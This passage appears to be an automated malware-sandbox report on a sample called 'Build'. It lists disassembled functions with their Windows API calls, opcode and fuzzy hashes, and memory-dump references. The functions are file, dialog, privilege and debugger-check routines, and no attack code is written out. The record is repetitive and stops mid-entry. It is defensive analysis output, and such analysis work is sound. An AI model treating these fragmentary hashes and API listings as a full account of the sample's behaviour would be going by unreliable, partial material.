Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a2c49e3b21cc91dcb8bdb7958e8993258235a4491f3536c64a61a0eaf9b0620
Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
Opcode Fuzzy Hash: 6a2c49e3b21cc91dcb8bdb7958e8993258235a4491f3536c64a61a0eaf9b0620
Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671

Function 003808DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 312842b507b8da512dbdcfcf4400699162b98891474765fb91c87c28dd40d365
Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
Opcode Fuzzy Hash: 312842b507b8da512dbdcfcf4400699162b98891474765fb91c87c28dd40d365
Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671

Function 00380A3C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1f200803c1c24f67bb267da7e330572ce05342ddb0146729fba99701c2c34c9f
Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
Opcode Fuzzy Hash: 1f200803c1c24f67bb267da7e330572ce05342ddb0146729fba99701c2c34c9f
Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231

Function 00380A32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7dd4d7a802ca7945adf0376985bcdce6fcb4618a55bd9f65f0a4035c3b7d1137
Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
Opcode Fuzzy Hash: 7dd4d7a802ca7945adf0376985bcdce6fcb4618a55bd9f65f0a4035c3b7d1137
Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231

Function 00380A1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d120104393efb7874b818d5d9b42f7a481bb5365fd7819fecdb77632a4b0a3b0
Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
Opcode Fuzzy Hash: d120104393efb7874b818d5d9b42f7a481bb5365fd7819fecdb77632a4b0a3b0
Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231

Function 00380A46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f48989a9a2e75713d2afbee2e63adcb622794301d18bb0a413667b7fd89635a2
Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
Opcode Fuzzy Hash: f48989a9a2e75713d2afbee2e63adcb622794301d18bb0a413667b7fd89635a2
Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231

Function 0036B949 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0036A712,?,?,?,?,?,?,?), ref: 0036B94C

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: ec8b0ce66f7e5ab1317421dee4177769e27566d50a7400c638a3605fe6b2ddd7
Instruction ID: 3c81d1c1ac57621602fbddf3e69b483e1cc8aa37cddabfc7fe6fc0e9d950c418
Opcode Fuzzy Hash: ec8b0ce66f7e5ab1317421dee4177769e27566d50a7400c638a3605fe6b2ddd7
Instruction Fuzzy Hash: 05A0243004400D47CD011731CD1500C3710F7117C070001D45007CF071C7134417C700

Function 0037CBB6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0037CBBA

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 30e9a61bf1df1778690c13682657808e8de85862204d98301f23b8d6c14a8b03
Instruction ID: e359598d827233d845272e023bec5dbd1e4dc6d5eb82b1f736403cc753e56c76
Opcode Fuzzy Hash: 30e9a61bf1df1778690c13682657808e8de85862204d98301f23b8d6c14a8b03
Instruction Fuzzy Hash: 81A001712062019B96025B329F4AA4EBAAAAFA2B51F05C42AA54684171DB368860AA15

Non-executed Functions

Function 0037E560 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 240windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0037E602
EndDialog.USER32(?,00000006), ref: 0037E615
GetDlgItem.USER32(?,0000006C), ref: 0037E631
SetFocus.USER32(00000000), ref: 0037E638
SetDlgItemTextW.USER32(?,00000065,?), ref: 0037E66C
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0037E69F
FindFirstFileW.KERNEL32(?,?), ref: 0037E6B5

Part of subcall function 0037CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CBEE
Part of subcall function 0037CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0037CC05
Part of subcall function 0037CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 0037CC19
Part of subcall function 0037CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CC2A
Part of subcall function 0037CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037CC42
Part of subcall function 0037CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0037CC66
Part of subcall function 0037CBC8: _swprintf.LIBCMT ref: 0037CC85

_swprintf.LIBCMT ref: 0037E704

Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0037E717
FindClose.KERNEL32(00000000), ref: 0037E71E
_swprintf.LIBCMT ref: 0037E773
SetDlgItemTextW.USER32(?,00000068,?), ref: 0037E786
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0037E7A0
_swprintf.LIBCMT ref: 0037E7D9
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0037E7EC
_swprintf.LIBCMT ref: 0037E83C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0037E84F

Part of subcall function 0037D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037D0E1
Part of subcall function 0037D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,003A272C,?,?), ref: 0037D12A

Strings

%s %s, xrefs: 0037E6F1, 0037E6FD, 0037E769, 0037E7CF, 0037E832
REPLACEFILEDLG, xrefs: 0037E59C
-8, xrefs: 0037E68C

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
String ID: %s %s$-8$REPLACEFILEDLG
API String ID: 3464475507-1750762989
Opcode ID: a9e6fac3a799cf9ca245ed4795969d0a8d08b718146351d62d7c81797851d099
Instruction ID: 32de9a536e8b094f96efff347b50c3b9da90e06895ef588435b861f377aa09eb
Opcode Fuzzy Hash: a9e6fac3a799cf9ca245ed4795969d0a8d08b718146351d62d7c81797851d099
Instruction Fuzzy Hash: C171D7B2548344BBE333AB64DC49FFF779CEB8A710F054819F64DD6180DA79A9048B62

Function 00367FD3 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 365fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0036807F
_wcslen.LIBCMT ref: 00368112

Part of subcall function 00368C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00368CB2
Part of subcall function 00368C95: GetLastError.KERNEL32 ref: 00368CF6
Part of subcall function 00368C95: CloseHandle.KERNEL32(?), ref: 00368D05

Part of subcall function 0036BC65: DeleteFileW.KERNELBASE(?,?,?,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036BC82
Part of subcall function 0036BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?), ref: 0036BCAE

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 003681C1
CloseHandle.KERNEL32(00000000), ref: 003681DD
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,92C77967,00000000), ref: 00368329

Part of subcall function 0036B7E2: FlushFileBuffers.KERNEL32(?), ref: 0036B7FC
Part of subcall function 0036B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 0036B8B0

Part of subcall function 0036AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,0036AF75,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036AFEB

Part of subcall function 0036C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0036BF5E,?,?), ref: 0036C305
Part of subcall function 0036C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036BF5E,?,?), ref: 0036C334

Strings

SeRestorePrivilege, xrefs: 00368034
UNC\, xrefs: 003680D2
\??\, xrefs: 003680A1
SeCreateSymbolicLinkPrivilege, xrefs: 0036803E

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 243576179-3508440684
Opcode ID: d6071b76c3ff4f760d95a9486f732426175692698428229b68072b9c6e345dd3
Instruction ID: 69975b72cb93abd0153fb03cbb448c1f6a3638b772409084e778edc0ce27481c
Opcode Fuzzy Hash: d6071b76c3ff4f760d95a9486f732426175692698428229b68072b9c6e345dd3
Instruction Fuzzy Hash: 12D1CBB5900249AFDB22DF60CC81FEEB7ACBF09704F50861AF645EB245DB74A644CB61

Function 00381FCA Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00381FD6
IsDebuggerPresent.KERNEL32 ref: 003820A2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003820C2
UnhandledExceptionFilter.KERNEL32(?), ref: 003820CC

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 9c7b0c1fb0ec903a73388723be2360e0eccc38c1ecb509afe6e7f70864cfdb4d
Instruction ID: a8b9a30e6ea3c4db26e434d40f18ea4f65582be6d90b5b7c1fa356bf6e2b31b5
Opcode Fuzzy Hash: 9c7b0c1fb0ec903a73388723be2360e0eccc38c1ecb509afe6e7f70864cfdb4d
Instruction Fuzzy Hash: F1311A75D053189BDF21EFA4D98A7CDBBB8AF04300F1041DAE409AB251EB715A84CF04

Function 00380B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00380AC5,0000001C,00380CBA,00000000,?,?,?,?,?,?,?,00380AC5,00000004,003C5D24,00380D4A), ref: 00380B91
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00380AC5,00000004,003C5D24,00380D4A), ref: 00380BAC

Strings

D, xrefs: 00380BA0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 9e4767037e36431ac4fe824b9cc37d0a4d97d7ee3a1c279bd3a79c8dc1bee0d6
Instruction ID: 38213726ac504612195800018cf06cd146b6f0f3a57c45066388983c15743060
Opcode Fuzzy Hash: 9e4767037e36431ac4fe824b9cc37d0a4d97d7ee3a1c279bd3a79c8dc1bee0d6
Instruction Fuzzy Hash: 5701F7326002096BCF19EF29DC05FDE7BA9AFC4328F0DC125AD59E7244D634E8058780

Function 0037D0AB Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037D0E1
GetNumberFormatW.KERNEL32(00000400,00000000,?,003A272C,?,?), ref: 0037D12A

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: ff464214ecd2e1ffddd753d41daf190006da7bc93b4b6b6fe7640c4f664821f5
Instruction ID: ecd12251e52a9aca0e3c9241c46a6d743a3b49f6fa763ef1b248baab3d5b7435
Opcode Fuzzy Hash: ff464214ecd2e1ffddd753d41daf190006da7bc93b4b6b6fe7640c4f664821f5
Instruction Fuzzy Hash: E9116D79211308ABD712DF64DC41FABB7BCFF09700F00842AF905E7291D671AA45CB65

Function 0036D076 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0036D0A7

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ac1ce49555f783f643d89a4e2bc5549148a08fcf83887678d863e8ce6cd0d47b
Instruction ID: 8814412b0072c3797c7ec12f139f20f7211b28fad4f057271b5274171e448274
Opcode Fuzzy Hash: ac1ce49555f783f643d89a4e2bc5549148a08fcf83887678d863e8ce6cd0d47b
Instruction Fuzzy Hash: 45018171E00608CFDB2ACF78EC8169E77B9FB5A304F208219D61A97395EB349909CF40

Function 00370244 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 240COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00370284

Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13

Part of subcall function 00373F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0036F801,00000000,00000000,?,003A5070,?,0036F801,?,?,00000050,?), ref: 00373F64

_strlen.LIBCMT ref: 003702A5
SetDlgItemTextW.USER32(?,003A2274,?), ref: 003702FE
GetWindowRect.USER32(?,?), ref: 00370334
GetClientRect.USER32(?,?), ref: 00370340
GetWindowLongW.USER32(?,000000F0), ref: 003703EB
GetWindowRect.USER32(?,?), ref: 0037041B
SetWindowTextW.USER32(?,?), ref: 0037044A
GetSystemMetrics.USER32(00000008), ref: 00370452
GetWindow.USER32(?,00000005), ref: 0037045D
GetWindowRect.USER32(00000000,?), ref: 0037048D
GetWindow.USER32(00000000,00000002), ref: 003704FF

Strings

$%s:, xrefs: 0037026D
t":, xrefs: 003702B9
d, xrefs: 00370360
CAPTION, xrefs: 00370432

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
